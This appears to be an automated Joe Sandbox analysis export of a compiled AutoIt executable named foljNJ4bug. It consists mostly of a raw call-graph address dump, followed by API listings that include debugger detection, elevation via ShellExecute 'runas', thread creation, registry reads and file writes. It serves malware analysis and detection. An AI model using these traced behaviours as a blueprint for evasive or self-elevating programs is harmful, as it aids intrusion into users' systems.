88135->88655 88136 40c2c0 52 API calls 88136->88173 88137->88135 88138 4115d7 52 API calls 88137->88138 88140 429d31 88138->88140 88141 429dd3 88139->88141 88656 40b400 VariantClear VariantClear moneypunct 88139->88656 88145 429d42 88140->88145 88652 44a801 52 API calls 88140->88652 88141->88205 88657 40e1c0 VariantClear moneypunct 88141->88657 88142 429a46 VariantClear 88142->88173 88143 409fd2 88148 40a045 88143->88148 88200 42a3f5 88143->88200 88154 40e0a0 52 API calls 88145->88154 88152 4115d7 52 API calls 88148->88152 88149 408f40 VariantClear 88149->88173 88158 4115d7 52 API calls 88150->88158 88159 40a04c 88152->88159 88160 429d57 88154->88160 88156 42a42f 88661 45e737 90 API calls 3 library calls 88156->88661 88158->88177 88162 40a0a7 88159->88162 88166 4091e0 315 API calls 88159->88166 88653 453443 52 API calls 88160->88653 88184 40a0af 88162->88184 88662 40c790 VariantClear moneypunct 88162->88662 88163 4299d9 88167 408f40 VariantClear 88163->88167 88673 45e737 90 API calls 3 library calls 88164->88673 88166->88162 88172 4299e2 88167->88172 88168 429abd 88168->87081 88169 429d88 88654 453443 52 API calls 88169->88654 88649 410c60 VariantClear moneypunct 88172->88649 88173->88130 88173->88131 88173->88133 88173->88136 88173->88142 88173->88149 88173->88150 88173->88163 88173->88164 88173->88168 88175 42a452 88173->88175 88179 40a780 192 API calls 88173->88179 88648 40c4e0 192 API calls 88173->88648 88650 40ba10 52 API calls 2 library calls 88173->88650 88651 40e270 VariantClear moneypunct 88173->88651 88175->88126 88177->88118 88179->88173 88180 402780 52 API calls 88180->88205 88182 408f40 VariantClear 88213 40a162 moneypunct _memmove 88182->88213 88183 41130a 51 API calls __cinit 88183->88205 88185 40a11b 88184->88185 88188 42a4b4 VariantClear 88184->88188 88184->88213 88193 40a12d moneypunct 88185->88193 88663 40e270 VariantClear moneypunct 88185->88663 88186 40a780 192 API calls 88186->88205 88187 4115d7 52 API calls 88187->88205 88188->88193 88190 401980 53 API calls 88190->88205 88191 408e80 VariantClear 88191->88205 88192 4115d7 52 API calls 88192->88213 88193->88192 88193->88213 88194 408e80 VariantClear 88194->88213 88196 44a801 52 API calls 88196->88205 88197 42a74d VariantClear 88197->88213 88198 40a368 88199 42aad4 88198->88199 88208 40a397 88198->88208 88666 46fe90 VariantClear VariantClear moneypunct 88199->88666 88660 47390f VariantClear 88200->88660 88201 42a7e4 VariantClear 88201->88213 88202 42a886 VariantClear 88202->88213 88204 409c95 88204->87081 88205->88143 88205->88156 88205->88177 88205->88180 88205->88183 88205->88186 88205->88187 88205->88190 88205->88191 88205->88196 88205->88200 88205->88204 88658 45f508 52 API calls 88205->88658 88659 403e10 53 API calls 88205->88659 88206 40a3ce 88220 40a3d9 moneypunct 88206->88220 88667 40b400 VariantClear VariantClear moneypunct 88206->88667 88207 40e270 VariantClear 88207->88213 88208->88206 88233 40a42c moneypunct 88208->88233 88646 40b400 VariantClear VariantClear moneypunct 88208->88646 88211 42abaf 88216 42abd4 VariantClear 88211->88216 88227 40a4ee moneypunct 88211->88227 88212 4115d7 52 API calls 88212->88213 88213->88182 88213->88194 88213->88197 88213->88198 88213->88199 88213->88201 88213->88202 88213->88207 88213->88212 88215 4115d7 52 API calls 88213->88215 88664 470870 52 API calls 88213->88664 88665 44ccf1 VariantClear moneypunct 88213->88665 88214 40a4dc 88214->88227 88669 40e270 VariantClear moneypunct 88214->88669 88217 42a5a6 VariantInit VariantCopy 88215->88217 88216->88227 88217->88213 88222 42a5c6 VariantClear 88217->88222 88218 42ac4f 88226 42ac79 VariantClear 88218->88226 88231 40a546 moneypunct 88218->88231 88221 40a41a 88220->88221 88224 42ab44 VariantClear 88220->88224 88220->88233 88221->88233 88668 40e270 VariantClear moneypunct 88221->88668 88222->88213 88223 40a534 88223->88231 88670 40e270 VariantClear moneypunct 88223->88670 88224->88233 88226->88231 88227->88218 88227->88223 88228 42ad28 88234 42ad4e VariantClear 88228->88234 88239 40a583 moneypunct 88228->88239 88231->88228 88232 40a571 88231->88232 88232->88239 88671 40e270 VariantClear moneypunct 88232->88671 88233->88211 88233->88214 88234->88239 88236 40a650 moneypunct 88236->87081 88237 42ae0e VariantClear 88237->88239 88239->88236 88239->88237 88672 40e270 VariantClear moneypunct 88239->88672 88240->87081 88241->87029 88242->87035 88243->87081 88244->87081 88245->87081 88246->87081 88247->87086 88248->87086 88249->87086 88250->87086 88251->87086 88252->87086 88253->87086 88255 403cdf 88254->88255 88256 408f40 VariantClear 88255->88256 88257 403ce7 88256->88257 88257->87073 88258->87086 88259->87086 88260->87081 88261->87026 88263 408e88 88262->88263 88265 408e94 88262->88265 88264 408f40 VariantClear 88263->88264 88264->88265 88266 45340c 85 API calls 88265->88266 88266->87986 88267->87990 88268->87992 88269->87994 88270->87978 88271->87970 88272->88006 88273->88003 88274->88024 88275->88015 88276->87970 88278 40a7a6 88277->88278 88279 40ae8c 88277->88279 88281 4115d7 52 API calls 88278->88281 88320 41130a 51 API calls __cinit 88279->88320 88314 40a7c6 moneypunct _memmove 88281->88314 88282 40a86d 88284 40abd1 88282->88284 88298 40a878 moneypunct 88282->88298 88283 408e80 VariantClear 88283->88314 88325 45e737 90 API calls 3 library calls 88284->88325 88285 401b10 52 API calls 88285->88314 88287 42b791 VariantClear 88287->88314 88288 42ba2d VariantClear 88288->88314 88289 408f40 VariantClear 88289->88298 88290 40e270 VariantClear 88290->88314 88291 42b459 VariantClear 88291->88314 88292 40a884 moneypunct 88292->88024 88294 42b6f6 VariantClear 88294->88314 88295 40bc10 53 API calls 88295->88314 88296 408cc0 185 API calls 88296->88314 88297 42bc5b 88297->88024 88298->88289 88298->88292 88299 42bbf5 88326 45e737 90 API calls 3 library calls 88299->88326 88300 42bb6a 88328 44b92d VariantClear 88300->88328 88301 4115d7 52 API calls 88301->88314 88302 4115d7 52 API calls 88306 42b5b3 VariantInit VariantCopy 88302->88306 88303 40b5f0 89 API calls 88303->88314 88305 408f40 VariantClear 88305->88314 88308 42b5d7 VariantClear 88306->88308 88306->88314 88308->88314 88311 42bc37 88327 45e737 90 API calls 3 library calls 88311->88327 88314->88282 88314->88283 88314->88284 88314->88285 88314->88287 88314->88288 88314->88290 88314->88291 88314->88294 88314->88295 88314->88296 88314->88299 88314->88300 88314->88301 88314->88302 88314->88303 88314->88305 88314->88311 88317 4530c9 VariantClear 88314->88317 88321 45308a 53 API calls 88314->88321 88322 470870 52 API calls 88314->88322 88323 457f66 87 API calls __write_nolock 88314->88323 88324 472f47 127 API calls 88314->88324 88315 42bc48 88315->88300 88316 408f40 VariantClear 88315->88316 88316->88300 88317->88314 88318->88011 88319->88014 88320->88314 88321->88314 88322->88314 88323->88314 88324->88314 88325->88300 88326->88300 88327->88315 88328->88297 88329->88031 88330->88034 88331->88051 88332->88049 88333->88039 88334->88065 88335->88085 88336->88065 88337->88087 88338->88065 88339->88087 88340->88069 88341->88087 88342->88072 88343->88087 88344->88087 88345->88067 88347 4289d2 88346->88347 88348 408db3 88346->88348 88376 45e737 90 API calls 3 library calls 88347->88376 88374 40bec0 90 API calls 88348->88374 88351 4289e5 88377 45e737 90 API calls 3 library calls 88351->88377 88354 428a05 88355 408f40 VariantClear 88354->88355 88361 408e5a 88355->88361 88356 40a780 192 API calls 88359 408dc9 88356->88359 88357 408e64 88358 408f40 VariantClear 88357->88358 88358->88361 88359->88351 88359->88354 88359->88356 88359->88357 88360 408f40 VariantClear 88359->88360 88359->88361 88375 40ba10 52 API calls 2 library calls 88359->88375 88360->88359 88361->88093 88363 408f40 VariantClear 88362->88363 88364 403d20 88363->88364 88365 403cd0 VariantClear 88364->88365 88366 403d4d 88365->88366 88378 467897 88366->88378 88422 4755ad 88366->88422 88425 46e91c 88366->88425 88428 45e17d 88366->88428 88367 403d76 88367->88090 88367->88099 88372->88090 88373->88092 88374->88359 88375->88359 88376->88351 88377->88354 88379 4678bb 88378->88379 88407 467954 88379->88407 88454 45340c 85 API calls 88379->88454 88380 4115d7 52 API calls 88381 467989 88380->88381 88383 467995 88381->88383 88458 40da60 53 API calls 88381->88458 88438 4533eb 88383->88438 88384 4678f6 88386 413a0e __wsplitpath 46 API calls 88384->88386 88388 4678fc 88386->88388 88389 401b10 52 API calls 88388->88389 88392 46790c 88389->88392 88455 40d200 52 API calls 2 library calls 88392->88455 88395 4679c7 GetLastError 88398 403cd0 VariantClear 88395->88398 88396 467a05 88401 467a2c 88396->88401 88402 467a4b 88396->88402 88397 467917 88397->88407 88456 4339fa GetFileAttributesW FindFirstFileW FindClose 88397->88456 88399 4679dc 88398->88399 88404 4679e6 88399->88404 88459 44ae3e 88399->88459 88403 4115d7 52 API calls 88401->88403 88405 4115d7 52 API calls 88402->88405 88409 467a31 88403->88409 88413 408f40 VariantClear 88404->88413 88411 467a49 88405->88411 88406 467928 88406->88407 88412 46792f 88406->88412 88407->88380 88408 467964 88407->88408 88408->88367 88462 436299 52 API calls 2 library calls 88409->88462 88417 408f40 VariantClear 88411->88417 88457 4335cd 56 API calls 3 library calls 88412->88457 88416 4679ed 88413->88416 88416->88367 88419 467a88 88417->88419 88418 467939 88418->88407 88420 408f40 VariantClear 88418->88420 88419->88367 88421 467947 88420->88421 88421->88407 88486 475077 88422->88486 88424 4755c0 88424->88367 88585 46e785 88425->88585 88427 46e92f 88427->88367 88429 45e198 88428->88429 88430 45e19c 88429->88430 88431 45e1b8 88429->88431 88432 408f40 VariantClear 88430->88432 88433 45e1cc 88431->88433 88434 45e1db FindClose 88431->88434 88435 45e1a4 88432->88435 88436 45e1d9 moneypunct 88433->88436 88437 44ae3e CloseHandle 88433->88437 88434->88436 88435->88367 88436->88367 88437->88436 88439 453404 88438->88439 88440 4533f8 88438->88440 88442 40de40 88439->88442 88440->88439 88463 4531b1 85 API calls 5 library calls 88440->88463 88464 40da20 88442->88464 88444 40de4e 88468 40f110 88444->88468 88447 4264fa 88449 40de84 88477 40e080 SetFilePointerEx SetFilePointerEx 88449->88477 88451 40de8b 88478 40f160 SetFilePointerEx SetFilePointerEx WriteFile 88451->88478 88453 40de90 88453->88395 88453->88396 88454->88384 88455->88397 88456->88406 88457->88418 88458->88383 88461 44ae4b moneypunct 88459->88461 88480 443fdf 88459->88480 88461->88404 88462->88411 88463->88439 88465 40da37 88464->88465 88466 40da29 88464->88466 88465->88466 88467 40da3c CloseHandle 88465->88467 88466->88444 88467->88444 88469 40f125 CreateFileW 88468->88469 88470 42630c 88468->88470 88472 40de74 88469->88472 88471 426311 CreateFileW 88470->88471 88470->88472 88471->88472 88473 426337 88471->88473 88472->88447 88476 40dea0 55 API calls moneypunct 88472->88476 88479 40df90 SetFilePointerEx SetFilePointerEx 88473->88479 88475 426342 88475->88472 88476->88449 88477->88451 88478->88453 88479->88475 88481 40da20 CloseHandle 88480->88481 88487 4533eb 85 API calls 88486->88487 88488 4750b8 88487->88488 88489 4750ee 88488->88489 88490 475129 88488->88490 88492 408f40 VariantClear 88489->88492 88537 4646e0 88490->88537 88497 4750f5 88492->88497 88493 47515e 88494 475162 88493->88494 88531 47518e 88493->88531 88495 408f40 VariantClear 88494->88495 88526 475169 88495->88526 88496 475357 88498 475365 88496->88498 88499 4754ea 88496->88499 88497->88424 88571 44b3ac 57 API calls 88498->88571 88577 464812 91 API calls 88499->88577 88503 4754fc 88504 475374 88503->88504 88506 475508 88503->88506 88550 430d31 88504->88550 88505 4533eb 85 API calls 88505->88531 88507 408f40 VariantClear 88506->88507 88510 47550f 88507->88510 88510->88526 88511 475388 88557 4577e9 88511->88557 88513 47539e 88565 410cfc 88513->88565 88514 475480 88516 408f40 VariantClear 88514->88516 88516->88526 88524 4754b5 88525 408f40 VariantClear 88524->88525 88525->88526 88526->88424 88531->88496 88531->88505 88531->88514 88531->88524 88531->88531 88569 436299 52 API calls 2 library calls 88531->88569 88570 463ad5 64 API calls __wcsicoll 88531->88570 88580 4536f7 53 API calls 88537->88580 88539 4646fc 88581 4426cd 59 API calls _wcslen 88539->88581 88541 464711 88543 40bc70 52 API calls 88541->88543 88549 46474b 88541->88549 88544 46472c 88543->88544 88582 461465 52 API calls _memmove 88544->88582 88546 464741 88547 40c600 52 API calls 88546->88547 88547->88549 88548 464793 88548->88493 88549->88548 88583 463ad5 64 API calls __wcsicoll 88549->88583 88551 430db2 88550->88551 88552 430d54 88550->88552 88551->88511 88553 4115d7 52 API calls 88552->88553 88556 430d74 88553->88556 88554 430da9 88554->88511 88555 4115d7 52 API calls 88555->88556 88556->88554 88556->88555 88558 457a84 88557->88558 88564 45780c _strcat moneypunct _wcslen _wcscpy 88557->88564 88558->88513 88559 443006 57 API calls 88559->88564 88560 45340c 85 API calls 88560->88564 88562 4135bb 46 API calls _malloc 88562->88564 88563 40f6f0 54 API calls 88563->88564 88564->88558 88564->88559 88564->88560 88564->88562 88564->88563 88584 44b3ac 57 API calls 88564->88584 88567 410d11 88565->88567 88566 410da9 VirtualProtect 88568 410d77 88566->88568 88567->88566 88567->88568 88569->88531 88570->88531 88571->88504 88577->88503 88580->88539 88581->88541 88582->88546 88583->88548 88584->88564 88586 46e7a2 88585->88586 88587 4115d7 52 API calls 88586->88587 88590 46e802 88586->88590 88588 46e7ad 88587->88588 88589 46e7b9 88588->88589 88633 40da60 53 API calls 88588->88633 88595 4533eb 85 API calls 88589->88595 88591 46e7e5 88590->88591 88598 46e82f 88590->88598 88592 408f40 VariantClear 88591->88592 88594 46e7ea 88592->88594 88594->88427 88596 46e7ca 88595->88596 88599 40de40 60 API calls 88596->88599 88597 46e8b5 88626 4680ed 88597->88626 88598->88597 88601 46e845 88598->88601 88602 46e7d7 88599->88602 88604 4533eb 85 API calls 88601->88604 88602->88598 88605 46e7db 88602->88605 88603 46e8bb 88630 443fbe 88603->88630 88611 46e84b 88604->88611 88605->88591 88607 44ae3e CloseHandle 88605->88607 88606 46e87a 88634 4689f4 59 API calls 88606->88634 88607->88591 88610 46e883 88613 4013c0 52 API calls 88610->88613 88611->88606 88611->88610 88614 46e88f 88613->88614 88616 40e0a0 52 API calls 88614->88616 88615 408f40 VariantClear 88624 46e881 88615->88624 88617 46e899 88616->88617 88635 40d200 52 API calls 2 library calls 88617->88635 88618 46e911 88618->88427 88620 40da20 CloseHandle 88622 46e903 88620->88622 88621 46e8a5 88636 4689f4 59 API calls 88621->88636 88625 44ae3e CloseHandle 88622->88625 88624->88618 88624->88620 88625->88618 88627 468100 88626->88627 88628 4680fa 88626->88628 88627->88603 88637 467ac4 55 API calls 2 library calls 88628->88637 88638 443e36 88630->88638 88632 443fd3 88632->88615 88632->88624 88633->88589 88634->88624 88635->88621 88636->88624 88637->88627 88641 443e19 88638->88641 88642 443e26 88641->88642 88643 443e32 WriteFile 88641->88643 88644 443db4 SetFilePointerEx SetFilePointerEx 88642->88644 88643->88632 88644->88643 88645->88111 88646->88206 88647->88125 88648->88173 88649->88236 88650->88173 88651->88173 88652->88145 88653->88169 88654->88135 88655->88139 88656->88141 88657->88205 88658->88205 88659->88205 88660->88156 88661->88175 88662->88162 88663->88193 88664->88213 88665->88213 88666->88206 88667->88220 88668->88233 88669->88227 88670->88231 88671->88239 88672->88239 88673->88175 88674->88129 88675 42d154 88679 480a8d 88675->88679 88677 42d161 88678 480a8d 192 API calls 88677->88678 88678->88677 88680 480ae4 88679->88680 88681 480b26 88679->88681 88682 480aeb 88680->88682 88683 480b15 88680->88683 88684 40bc70 52 API calls 88681->88684 88685 480aee 88682->88685 88686 480b04 88682->88686 88712 4805bf 192 API calls 88683->88712 88699 480b2e 88684->88699 88685->88681 88688 480af3 88685->88688 88711 47fea2 192 API calls __itow_s 88686->88711 88710 47f135 192 API calls 88688->88710 88690 40e0a0 52 API calls 88690->88699 88693 408f40 VariantClear 88694 481156 88693->88694 88696 408f40 VariantClear 88694->88696 88695 480aff 88695->88693 88697 48115e 88696->88697 88697->88677 88698 40e710 53 API calls 88698->88699 88699->88690 88699->88695 88699->88698 88700 401980 53 API calls 88699->88700 88702 40c2c0 52 API calls 88699->88702 88703 40a780 192 API calls 88699->88703 88704 408e80 VariantClear 88699->88704 88705 480ff5 88699->88705 88713 45377f 52 API calls 88699->88713 88714 45e951 53 API calls 88699->88714 88715 40e830 53 API calls 88699->88715 88716 47925f 53 API calls 88699->88716 88717 47fcff 192 API calls 88699->88717 88700->88699 88702->88699 88703->88699 88704->88699 88718 45e737 90 API calls 3 library calls 88705->88718 88710->88695 88711->88695 88712->88695 88713->88699 88714->88699 88715->88699 88716->88699 88717->88699 88718->88695 88719 42b14b 88726 40bc10 88719->88726 88721 42b159 88722 4096a0 329 API calls 88721->88722 88723 42b177 88722->88723 88737 44b92d VariantClear 88723->88737 88725 42bc5b 88727 40bc24 88726->88727 88728 40bc17 88726->88728 88730 40bc2a 88727->88730 88731 40bc3c 88727->88731 88729 408e80 VariantClear 88728->88729 88732 40bc1f 88729->88732 88733 408e80 VariantClear 88730->88733 88734 4115d7 52 API calls 88731->88734 88732->88721 88735 40bc33 88733->88735 88736 40bc43 88734->88736 88735->88721 88736->88721 88737->88725 88738 425b2b 88743 40f000 88738->88743 88742 425b3a 88744 4115d7 52 API calls 88743->88744 88745 40f007 88744->88745 88746 4276ea 88745->88746 88752 40f030 88745->88752 88751 41130a 51 API calls __cinit 88751->88742 88753 40f039 88752->88753 88754 40f01a 88752->88754 88782 41130a 51 API calls __cinit 88753->88782 88756 40e500 88754->88756 88757 40bc70 52 API calls 88756->88757 88758 40e515 GetVersionExW 88757->88758 88759 402160 52 API calls 88758->88759 88760 40e557 88759->88760 88783 40e660 88760->88783 88766 427674 88770 4276c6 GetSystemInfo 88766->88770 88768 40e5e0 88771 4276d5 GetSystemInfo 88768->88771 88797 40efd0 88768->88797 88769 40e5cd GetCurrentProcess 88804 40ef20 LoadLibraryA GetProcAddress 88769->88804 88770->88771 88775 40e629 88801 40ef90 88775->88801 88778 40e641 FreeLibrary 88779 40e644 88778->88779 88780 40e653 FreeLibrary 88779->88780 88781 40e656 88779->88781 88780->88781 88781->88751 88782->88754 88784 40e667 88783->88784 88785 42761d 88784->88785 88786 40c600 52 API calls 88784->88786 88787 40e55c 88786->88787 88788 40e680 88787->88788 88789 40e687 88788->88789 88790 427616 88789->88790 88791 40c600 52 API calls 88789->88791 88792 40e566 88791->88792 88792->88766 88793 40ef60 88792->88793 88794 40e5c8 88793->88794 88795 40ef66 LoadLibraryA 88793->88795 88794->88768 88794->88769 88795->88794 88796 40ef77 GetProcAddress 88795->88796 88796->88794 88798 40e620 88797->88798 88799 40efd6 LoadLibraryA 88797->88799 88798->88770 88798->88775 88799->88798 88800 40efe7 GetProcAddress 88799->88800 88800->88798 88805 40efb0 LoadLibraryA GetProcAddress 88801->88805 88803 40e632 GetNativeSystemInfo 88803->88778 88803->88779 88804->88768 88805->88803 88806 425b5e 88811 40c7f0 88806->88811 88810 425b6d 88846 40db10 52 API calls 88811->88846 88813 40c82a 88847 410ab0 6 API calls 88813->88847 88815 40c86d 88816 40bc70 52 API calls 88815->88816 88817 40c877 88816->88817 88818 40bc70 52 API calls 88817->88818 88819 40c881 88818->88819 88820 40bc70 52 API calls 88819->88820 88821 40c88b 88820->88821 88822 40bc70 52 API calls 88821->88822 88823 40c8d1 88822->88823 88824 40bc70 52 API calls 88823->88824 88825 40c991 88824->88825 88848 40d2c0 52 API calls 88825->88848 88827 40c99b 88849 40d0d0 53 API calls 88827->88849 88829 40c9c1 88830 40bc70 52 API calls 88829->88830 88831 40c9cb 88830->88831 88850 40e310 53 API calls 88831->88850 88833 40ca28 88834 408f40 VariantClear 88833->88834 88835 40ca30 88834->88835 88836 408f40 VariantClear 88835->88836 88837 40ca38 GetStdHandle 88836->88837 88838 429630 88837->88838 88839 40ca87 88837->88839 88838->88839 88840 429639 88838->88840 88845 41130a 51 API calls __cinit 88839->88845 88851 4432c0 57 API calls 88840->88851 88842 429641 88852 44b6ab CreateThread 88842->88852 88844 42964f CloseHandle 88844->88839 88845->88810 88846->88813 88847->88815 88848->88827 88849->88829 88850->88833 88851->88842 88852->88844 88853 44b5cb 58 API calls 88852->88853 88854 425b6f 88859 40dc90 88854->88859 88858 425b7e 88860 40bc70 52 API calls 88859->88860 88861 40dd03 88860->88861 88868 40f210 88861->88868 88863 426a97 88865 40dd96 88865->88863 88866 40ddb7 88865->88866 88871 40dc00 52 API calls 2 library calls 88865->88871 88867 41130a 51 API calls __cinit 88866->88867 88867->88858 88872 40f250 RegOpenKeyExW 88868->88872 88870 40f230 88870->88865 88871->88865 88873 425e17 88872->88873 88874 40f275 RegQueryValueExW 88872->88874 88873->88870 88875 40f2c3 RegCloseKey 88874->88875 88876 40f298 88874->88876 88875->88870 88877 40f2a9 RegCloseKey 88876->88877 88878 425e1d 88876->88878 88877->88870
                                                                                                                                              APIs
                                                                                                                                              • _wcslen.LIBCMT ref: 004096C1
                                                                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                              • _memmove.LIBCMT ref: 0040970C
                                                                                                                                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                                                                                              • _memmove.LIBCMT ref: 00409D96
                                                                                                                                              • _memmove.LIBCMT ref: 0040A6C4
                                                                                                                                              • _memmove.LIBCMT ref: 004297E5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2383988440-0
                                                                                                                                              • Opcode ID: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                                                                                                                                              • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                                                                                              • Opcode Fuzzy Hash: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                                                                                                                                              • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                                                                                                • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                                                                                                • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                                                                                                                • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                                                                                                                • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                                                                                                                • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                                                                                                                • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                                                                                              • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                                                                                                • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                                                                                              • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                                                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                                                                                              • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                                                                                                • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                                                                • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                                                                • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                                                                • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                                                                • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                                                                • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                                                                • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                                                                • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                                                                • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                                                                • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                                                                • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                                                                • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                                                                              Strings
                                                                                                                                              • runas, xrefs: 0042E2AD, 0042E2DC
                                                                                                                                              • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                                                                                              • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                                              • API String ID: 2495805114-3383388033
                                                                                                                                              • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                                                                                              • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                                                                                              • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                                                                                              • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
